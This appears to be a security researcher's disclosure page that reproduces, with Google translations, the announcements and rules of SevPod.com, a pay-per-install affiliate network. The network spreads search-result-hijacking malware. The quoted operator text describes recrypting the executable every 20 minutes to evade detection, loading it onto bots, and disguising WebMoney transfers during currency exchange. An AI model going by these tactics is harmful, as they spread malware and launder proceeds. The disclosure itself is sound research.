All accounts from $ 100 balance already received everything in time , accounts less than $ 100 - there were delays in payments . Now all automated now will go automatically , once a week, the amount of 1 cent ! Minimum payout is now virtually non-existent.

December 31 , 2013
Happy New Year!
It's time to give our Christmas gifts . Most downloads made ​​adverts with ID 11325 , and he also earned the most money for this New Year's week , and although another 6 hours of the campaign to okonchatsiya already unlikely anything will change . 2000 vmz paid rightful winner! Also take this opportunity to congratulate all our partners, customers , and just all -all-all a Happy Year 2014 . Good luck, all the best and success in the new year.

December 24 , 2013
Christmas gifts from SevPod.com
Congratulations to all a Happy Year 2014 , and I wish you health , success in business and success in all endeavors. Everyone knows that Santa Claus lives in the North, and, of course , he has two gifts for two of our best adverts , for the New Year 2014 .

$ 1000 to the person who will receive the greatest profit for the week 25 to 31 December *
$ 1000 to the person who will do the most downloads for the week of 25 to 31 December **

ID number accounts winners will be announced at 00.00 January 1, 2014 by MSK , news affiliate in this topic, and it promptly from affiliate programs on their SevPod.com WMZ account will be paid their Christmas gift !

* USD, for a total of all the days of action , according to statistics affiliate SevPod.com
** Downloads in total for all the days of action , according to statistics affiliate SevPod.com

About affiliate program SevPod.com

SevPod.com is the latest revolutionary affiliate program by substitution SERPs. We get maximum bids from our feed providers , 95 % of the funds received by us we give our adverts . Convert clicks almost all countries of the world , besides actively use more modern methods of monetizing traffic , such as pay per user activity on the site, pay per view and interact with different content . Unlike klikbotovogo traffic , we live traffic , so traffic is much more expensive , and will bring you an income for a long time since boot .

Register online SevPod.com, and knock me into a toad for apruvom your account : jabber@honese.com
Again all a Happy New Year 2014 !
Sincerely, Peter North

December 19 , 2013
Problem solved with the feedbacks !
The problem with otstuk completely solved , can be shipped without limitation, be sure to update exe file.

December 12 , 2013
low otstuk
A low level of feedbacks , I'm working on this in the next two days will be release in which the problem is solved . Bring all apologize for the inconvenience.

December 9 , 2013
Let's go!
Proudly want to introduce you to your new project - a private affiliate for substitution issue SevPod.com. I managed to make a really long-lived substitute , and your download will bring you income for many months , even after you stop shipping. Unlike other substitutions , I have bids for virtually all countries. Of course, miracles do not happen , and you will get the maximum revenue from the U.S., Canada , Australia, UK, Western Europe, but also the third world countries will be a long time to bring you a steady income ! 95% of the money that I get for clicks from feed providers , I'm paying your adverts . If you have any questions , you can ask them to me in the ticket .

All successful downloads!
------------------------------------------

SevPod - Rules
Rules:
------------------------------------------
Файл
Я гружу только подмену поисковой выдачи. Грузить можно параллельно с чем угодно, это ваше право, я не настаиваю на эксклюзиве. Запрещается грузить параллельно винлокеры или злые АВ, вообщем, все то, что блокирует процессы и не дает работать моей подмене выдачи. Все остальное - можно. Ссылка в разделе Линки - ПРИВАТНАЯ. Скачивайте файл себе, а оттуда уже раздавайте, напрямую с меня грузить запрещается. Файл перекриптовывается раз в 20 минут, лучше обновлять его у себя автоматически также раз в 20-30 минут. Если делаете это руками, то делайте не реже раза в день.

Выплаты
Выплаты производятся раз в неделю, по пятницам, за прошлую неделю, автоматически, на вебмани. Могу платить EPESE, просто указывайте в реквизитах вмз кошелек EPESE и свой аккаунт EPESE. Внимание! Цифры в стате могут уточняться до 7 дней, в большую сторону, по мере получения данных от наших партнеров.

Статистика
Задержка статистики порядка 10-20 минут, также часть загрузок могут достукивать в течение 1-2 дней, сверять статы лучше за период от 24 часов и больше.

Общее
Каждый, кто начал работать с системой, автоматически соглашается с этими правилами. Любому, кто нарушил данные правила, может быть отказано в оплате загрузок. Запрещается выгружать мой ехе из памяти, удалять/изменять мой файл, ключи реестра или любые мои данные, хранимые на клиенте. Аккаунты, уличенные в этом, будут заблокированы без выплат. Я оставляю за собой право, при необходимости, менять действующие правила выкупа загрузок, и, обязуюсь, по возможности, уведомлять всех участников системы об изменении этих правил.------------------------------------------Translated by Google as:------------------------------------------
file
I ship only substitution SERPs. Shipping can be parallel with anything, it is your right , I do not insist on exclusive. Prohibited from shipping or evil parallel vinlokery AB in general, everything that blocks the processes and does not work my substitution issue . Everything else - you can. Reference section Links - PRIVATE . Download the file itself, and from there to hand out directly with me to ship prohibited. Perekriptovyvaetsya file every 20 minutes , it is better to update it automatically also at times in 20-30 minutes. If you do that by hand , do at least once a day.

paymentsPayments are made once a week, on Fridays, in the last week , automatically, WebMoney . Can pay EPESE, just specify in the details vmz EPESE wallet and your account EPESE. Attention! The figures in the article may be adjusted up to 7 days in a big way , as data is received from our partners.
statisticsLatency statistics about 10-20 minutes , as part of downloads can dostukivat within 1-2 days , check the stats better for a period of 24 hours or more .
commonEveryone who began to work with the system automatically agree with these rules. Anyone who violated these rules may be denied payment downloads . It is forbidden to upload my exe from memory , delete / edit my file , registry keys , or any of my data stored on the client. Accounts found to be in it, will be blocked without payments. I reserve the right , if necessary , to change the current rules redemption downloads , and undertake , if possible, notify all participants in the system to change these rules.------------------------------------------
SevPod - Statistics - Overall

SevPod - Statistics - ByCountrySevpod - PaymentSevPod - TicketsSevPod - Link
Ннапрямую с этой ссылки грузить ехе на ботов НЕЛЬЗЯ, скачивайте ехе себе, линк ПРИВАТНЫЙ.Нарушение этого правила карается удалением аккаунта, без выплат.
----
Nnapryamuyu ship via this link exe NOT bots, download exe itself, PRIVATE link. Violation of this rule is punishable by deleting the account without payments.
Note: From what i understand Severa want those links to stay private and not sent as tasks in Botnet for instance as it could be catched by InfoSec community.
SevPod - ProfileFiles : KelihosPack_2014-05-10.zip (3 samples: Loader (Waledac), Simda and Kelihos bot)


SevPod now can pay in Bitcoin.
------------------------------------------
По многочисленным просьбам адвертов, я начинаю выплаты в биткоин. Теперь для выплат доступны две валюты: Webmoney(WMZ) и Bitcoin(BTC), по курсу BTC-E на момент выплаты. Для смены платежных реквизитов создавайте тикет. Также, поскольку теперь я буду работать с двумя этими электронными валютами, я предлагаю всем желающим обмен WMZ <-> BTC, условия ниже.

Условия обмена WMZ<->BTC от Severa

1) WMZ я готов принимать от аттестата, не ниже персонального, или чеками Paymer. Если у вас формальный или начальный аттестат, я буду смотреть BL, и принимать решение персонально. В любом случае, впарить мне грязные вебмани - это способ остаться и без них, и без биткоина, предупреждаю сразу. Так как Webmoney против таких обменов, в примечании перевода Webmoney обязательно указывать что-то нейтральное: "За услуги", "Частный перевод", "For services" или что-то еще.

2) Биткоин я принимаю любой, без ограничений

3) Минимальная сумма обмена - 1000 Usd. Поймите меня правильно, это не мой бизнес, я занимаюсь рассылками по емайл и партнеркой по подмене поисковой выдачи + кликботом, обмен денег - это не мое. Все обмены я делаю в ручном режиме, автоматического обменника не планируется.

4) Стоимость обмена в любую сторону - 3%

5) Верхних лимитов у меня нет, с радостью обменяю любую сумму в любую сторону

Для обмена стучите мне в жабу: jabber@honese.com
------------------------------------------Google translated as :------------------------------------------Due to numerous requests adverts , I begin payments in Bitcoin . Now available for payments two currencies : Webmoney (WMZ) and Bitcoin (BTC), at the rate of BTC-E at the time of payment . To change your billing information, create a ticket . Also, because now I will be working with these two electronic currency , I suggest everyone exchange WMZ <-> BTC, the conditions below.
Terms exchange WMZ <-> BTC from Severa
1 ) WMZ I am ready to take on the certificate , not less than personal , or checks Paymer. If you have a formal or initial certificate, I'll watch BL, and decide personally . In any case, I vparit vebmani dirty - it's a way to stay without them, and without Bitcoins , I warn you once . Since Webmoney against such exchanges , in a footnote translation Webmoney necessarily indicate something neutral " for services " , "Private transfer ", "For services" or something else.
2) I accept Bitcoin anyone without restrictions
3) The minimum amount of exchange - 1000 Usd. Do not misunderstand me , it's not my business , I do newsletters by email and affiliate for substitution SERPs + klikbotom , exchange of money - it's not mine . All exchanges I do in manual mode , automatic exchanger is planned.
4 ) Cost of the exchange in either direction - 3%
5) Upper limits I have gladly exchange any amount in any direction
To exchange knock me into a toad : jabber@honese.com------------------------------------------


Read More :Don’t Like Spam? Complain About It. - 2013-11-19 Brian KrebsWaledac Kelihos Botnet Takeover, Detection and Protection - 2012-03-28 - Brett Stone-Gross - Dell SecureWorksMr. Waledac: The Peter North of Spamming - 2012-01-26 - Brian KrebsOperation b79 (Kelihos) and Additional MSRT September Release - 2011-09-27 MSFT-MMPC